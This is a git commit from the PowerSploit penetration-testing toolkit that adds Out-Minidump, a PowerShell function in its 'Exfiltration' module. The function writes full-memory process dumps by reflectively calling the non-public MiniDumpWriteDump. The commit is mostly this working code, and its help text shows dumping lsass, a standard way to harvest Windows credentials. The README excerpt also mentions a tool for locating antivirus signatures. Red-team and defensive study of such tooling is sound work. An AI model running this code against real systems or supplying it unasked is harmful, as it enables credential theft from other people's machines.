authorMatt Graeber <mattgraeber@gmail.com>2013-05-15 20:54:16 -0400
committerMatt Graeber <mattgraeber@gmail.com>2013-05-15 20:54:16 -0400
commitaf04f7e52838f88069eaaad12b831a4af4a28091 (patch)
tree4711b1cb753fb17ea169a11f7539aa6d1aa95b2e
parentc17f16bf0ed0a1568c6cc503d3a5b68361c1f600 (diff)
Added Out-Minidump
Out-Minidump writes a process dump file with all process memory to disk. This is similar to running procdump.exe with the '-ma' switch.
-rw-r--r--Exfiltration/Exfiltration.psd13
-rw-r--r--Exfiltration/Out-Minidump.ps1133
-rw-r--r--README.md4
3 files changed, 139 insertions, 1 deletions
diff --git a/Exfiltration/Exfiltration.psd1 b/Exfiltration/Exfiltration.psd1
index 7eb9aa2..7c65566 100644
--- a/Exfiltration/Exfiltration.psd1
+++ b/Exfiltration/Exfiltration.psd1
@@ -73,7 +73,8 @@ AliasesToExport = ''
ModuleList = @(@{ModuleName = 'Exfiltration'; ModuleVersion = '1.0.0.0'; GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'})
# List of all files packaged with this module
-FileList = 'Exfiltration.psm1', 'Exfiltration.psd1', 'Get-TimedScreenshot.ps1', 'Usage.md'
+FileList = 'Exfiltration.psm1', 'Exfiltration.psd1', 'Get-TimedScreenshot.ps1', 'Out-Minidump.ps1',
+ 'Usage.md'
# Private data to pass to the module specified in RootModule/ModuleToProcess
# PrivateData = ''
diff --git a/Exfiltration/Out-Minidump.ps1 b/Exfiltration/Out-Minidump.ps1
new file mode 100644
index 0000000..b89f3dc
--- /dev/null
+++ b/Exfiltration/Out-Minidump.ps1
@@ -0,0 +1,133 @@
+function Out-Minidump
+{
+<#
+.SYNOPSIS
+
+ Generates a full-memory minidump of a process.
+
+ PowerSploit Function: Out-Minidump
+ Author: Matthew Graeber (@mattifestation)
+ License: BSD 3-Clause
+ Required Dependencies: None
+ Optional Dependencies: None
+
+.DESCRIPTION
+
+ Out-Minidump writes a process dump file with all process memory to disk.
+ This is similar to running procdump.exe with the '-ma' switch.
+
+.PARAMETER Id
+
+ Specifies the process ID of the process for which a dump will be generated.
+
+.PARAMETER DumpFilePath
+
+ Specifies the path where dump files will be written. By default, dump files
+ are written to the current working directory. Dump file names take following
+ form: processname_id.dmp
+
+.EXAMPLE
+
+ Out-Minidump -Id 4293
+
+ Description
+ -----------
+ Generate a minidump for process ID 4293.
+
+.EXAMPLE
+
+ Get-Process lsass | Out-Minidump
+
+ Description
+ -----------
+ Generate a minidump for the lsass process. Note: To dump lsass, you must be
+ running from an elevated prompt.
+
+.EXAMPLE
+
+ Get-Process | Out-Minidump -DumpFilePath C:\temp
+
+ Description
+ -----------
+ Generate a minidump of all running processes and save them to C:\temp.
+
+.INPUTS
+
+ System.Diagnostics.Process
+
+ You can pipe a process object to Out-Minidump.
+
+.OUTPUTS
+
+ None
+
+.LINK
+
+ http://www.exploit-monday.com/
+#>
+
+ [CmdletBinding()]
+ Param (
+ [Parameter(Position = 0, Mandatory = $True, ValueFromPipelineByPropertyName = $True)]
+ [ValidateScript({ Get-Process -Id $_ })]
+ [UInt16[]]
+ $Id,
+
+ [Parameter(Position = 1)]
+ [ValidateScript({ Test-Path $_ })]
+ [String]
+ $DumpFilePath = $PWD
+ )
+
+ BEGIN
+ {
+ $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')
+ $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic')
+ $Flags = [Reflection.BindingFlags] 'NonPublic, Static'
+ $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags)
+ $MiniDumpWithFullMemory = [UInt32] 2
+ }
+
+ PROCESS
+ {
+ foreach ($ProcessId in $Id)
+ {
+ $ProcessInfo = Get-Process -Id $ProcessId
+ $ProcessName = $ProcessInfo.Name
+ $ProcessHandle = $ProcessInfo.Handle
+ $ProcessFileName = "$($ProcessName)_$($ProcessId).dmp"
+
+ $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName
+
+ $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create)
+
+ $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle,
+ $ProcessId,
+ $FileStream.SafeFileHandle,
+ $MiniDumpWithFullMemory,
+ [IntPtr]::Zero,
+ [IntPtr]::Zero,
+ [IntPtr]::Zero))
+
+ $FileStream.Close()
+
+ if (-not $Result)
+ {
+ $Exception = [ComponentModel.Win32Exception][Runtime.InteropServices.Marshal]::GetLastWin32Error()
+ $ExceptionMessage = "$($Exception.Message) ($($ProcessName):$($ProcessId))"
+
+ # Remove any partially written dump files. For example, a partial dump will be written
+ # in the case when 32-bit PowerShell tries to dump a 64-bit process.
+ Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue
+
+ throw $ExceptionMessage
+ }
+ else
+ {
+ Write-Verbose "Success! Minidump written to $ProcessDumpPath."
+ }
+ }
+ }
+
+ END {}
+} \ No newline at end of file
diff --git a/README.md b/README.md
index 89ecb42..54f7997 100644
--- a/README.md
+++ b/README.md
@@ -128,6 +128,10 @@ Locates single Byte AV signatures utilizing the same method as DSplit from "clas
A function that takes screenshots at a regular interval and saves them to a folder.
+#### `Out-Minidump`
+
+Generates a full-memory minidump of a process.
+
## Recon
**Tools to aid in the reconnaissance phase of a penetration test.**